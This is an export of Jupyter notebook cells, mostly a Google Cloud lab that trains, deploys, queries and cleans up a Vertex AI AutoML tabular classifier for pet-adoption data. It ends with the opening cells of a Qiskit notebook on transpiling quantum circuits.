/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
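The deprecation warning in the output above suggests using `column_specs` in place of `column_transformations`. A hedged sketch of the equivalent job definition: `column_specs` maps column names to transformation types such as `"categorical"` or `"numeric"`, and the display name below is a hypothetical example. Recent SDK versions also expose a `get_auto_column_specs` helper that can generate this dict from the dataset.

```python
# Hedged sketch: the same training job expressed with column_specs instead of the
# deprecated column_transformations argument.
column_specs = {
    "Type": "categorical",
    "Age": "numeric",
    "Breed1": "categorical",
    "Color1": "categorical",
    "Color2": "categorical",
    "MaturitySize": "categorical",
    "FurLength": "categorical",
    "Vaccinated": "categorical",
    "Sterilized": "categorical",
    "Health": "categorical",
    "Fee": "numeric",
    "PhotoAmt": "numeric",
}

job_v2 = aiplatform.AutoMLTabularTrainingJob(
    display_name="train-petfinder-automl-column-specs",  # hypothetical display name
    optimization_prediction_type="classification",
    column_specs=column_specs,
)
```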
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
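Because deployment can take several minutes, it can be useful to confirm the model is actually attached to the endpoint before predicting. A hedged sketch using the endpoint's `list_models` method, assuming `endpoint` from the cell above:

```python
# List the models currently deployed on the endpoint; an empty list means deployment
# has not finished (or failed).
for deployed_model in endpoint.list_models():
    print(deployed_model.id, deployed_model.display_name)
```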
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
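Since every value in the instance must be a string (as noted above), it is easy to introduce type mismatches when building instances from other Python data. A small hedged sketch that coerces a plain record into the expected string-only payload before calling `predict`; the sample values below are hypothetical:

```python
# Coerce a raw record into the all-string instance format expected for this CSV-backed model.
raw_record = {"Type": "Dog", "Age": 2, "Breed1": "Poodle", "Gender": "Female",
              "Color1": "Brown", "Color2": "White", "MaturitySize": "Medium",
              "FurLength": "Medium", "Vaccinated": "Yes", "Sterilized": "No",
              "Health": "Healthy", "Fee": 0, "PhotoAmt": 3}

instance = {key: str(value) for key, value in raw_record.items()}
second_prediction = endpoint.predict([instance])
print(second_prediction.predictions)
```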
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#shutting_down_projects) you used for the tutorial. Otherwise, you can delete the individual resources you created in this tutorial: the Training Job, the Model, the Endpoint, and the Cloud Storage Bucket. **Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
if delete_training_job:
    job.delete()
# Delete the model
if delete_model:
    model.delete()
# Delete the endpoint
if delete_endpoint:
    endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
    ! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
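As the note above says, deployed models block endpoint deletion. If you prefer not to track `deployed_model_id`s yourself, the SDK also exposes a force option. This is a hedged alternative to the cleanup cell above (not something to run in addition to it), and the bucket removal works only for small buckets:

```python
# Hedged alternative cleanup: force=True undeploys any remaining models before deleting the endpoint.
endpoint.delete(force=True)

# Remove the bucket and its objects with the storage client instead of gsutil
# (force=True deletes contained objects first; suitable for small lab buckets).
if delete_bucket and "BUCKET_NAME" in globals():
    from google.cloud import storage

    bucket = storage.Client(project=PROJECT_ID).get_bucket(BUCKET_NAME.replace("gs://", ""))
    bucket.delete(force=True)
```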
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernel. After you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID. **If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
Timestamp. If you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on the resources created, you create a timestamp for each instance session and append it to the names of the resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket. **The following steps are required, regardless of your notebook environment.** This notebook demonstrates how to use the Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored. Set the name of your Cloud Storage bucket below; it must be unique across all of your Cloud Storage buckets. You may also change the `REGION` variable, which is used for operations throughout the rest of this notebook. Make sure to [choose a region where Vertex AI services are available](https://cloud.google.com/vertex-ai/docs/general/locations). You may not use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification_toy.csv"
! gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/petfinder-tabular-classification_toy.csv [Content-Type=text/csv]...
[1 files][378.2 KiB/378.2 KiB]
Operation completed over 1 objects/378.2 KiB.
###Markdown
Import Vertex SDK for Python. Import the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
Tutorial. Now you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSV. This section creates a dataset from a CSV file stored in your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
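###Markdown
As a quick sanity check, you can inspect the managed dataset you just created. This is a minimal sketch; it assumes the `create` call above has finished and that your SDK version exposes `TabularDataset.column_names`.
###Code
# Sketch: inspect the managed dataset created above
print(ds.resource_name)
# column_names triggers a metadata lookup on the dataset resource (assumed available in this SDK version)
print(ds.column_names)
###Output
_____no_output_____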
###Markdown
Launch a Training Job to Create a Model. With the dataset in place, you can now create and run a training job. The `run` function creates a training pipeline that trains and creates a `Model` object; after the training pipeline completes, `run` returns the `Model` object. **NOTE: It takes nearly 2 hours 15 minutes to complete the training. Please wait until the training has completed. If the training takes longer than the lab time allows, only review the next sections.**
###Code
# TODO 1
# Construct an AutoML tabular training job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two and a half hours to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
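###Markdown
Once `run` returns, the `Model` object wraps the uploaded model resource. A small optional sketch to confirm what was created:
###Code
# Sketch: basic details of the trained AutoML model
print(model.display_name)   # should match "adopted-prediction-model"
print(model.resource_name)  # fully qualified Model resource name
###Output
_____no_output_____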
###Markdown
Deploy your model. Before you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things: (1) creates an `Endpoint` resource to which the `Model` resource will be deployed, and (2) deploys the `Model` resource to the `Endpoint` resource. Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint. * This sample instance is taken from an observation in which `Adopted` = **Yes**. * Note that the values are all strings; since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` tell Vertex AI how to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
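###Markdown
The returned `Prediction` object exposes the raw results through its `predictions` field. For an AutoML tabular classification model this is typically a list of dicts with `classes` and `scores` keys; the following is a hedged sketch that assumes that format:
###Code
# Sketch: report the highest-scoring class for the first instance.
# Assumes each entry looks like {"classes": [...], "scores": [...]}.
result = prediction.predictions[0]
best_class, best_score = max(zip(result["classes"], result["scores"]), key=lambda pair: pair[1])
print(f"Predicted: {best_class} (score={best_score:.3f})")
###Output
_____no_output_____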
###Markdown
Undeploy the model. To undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter: - `deployed_model_id`: the model deployment identifier returned by the prediction service when the `Model` resource was deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
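###Markdown
If you want to confirm that the endpoint no longer serves any model before cleaning up, one option (a sketch, assuming your SDK version provides `Endpoint.list_models`) is:
###Code
# Sketch: should print an empty list once undeployment has finished
print(endpoint.list_models())
###Output
_____no_output_____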
###Markdown
Cleaning up. To clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#shutting_down_projects) you used for the tutorial. Otherwise, you can delete the individual resources you created in this tutorial: the training job, the model, the endpoint, and the Cloud Storage bucket. **Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
if delete_training_job:
    job.delete()
# Delete the model
if delete_model:
    model.delete()
# Delete the endpoint
if delete_endpoint:
    endpoint.delete()
# Delete the Cloud Storage bucket
if delete_bucket and "BUCKET_NAME" in globals():
    ! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
content/ch-quantum-hardware/transpiling-quantum-circuits.ipynb | ###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
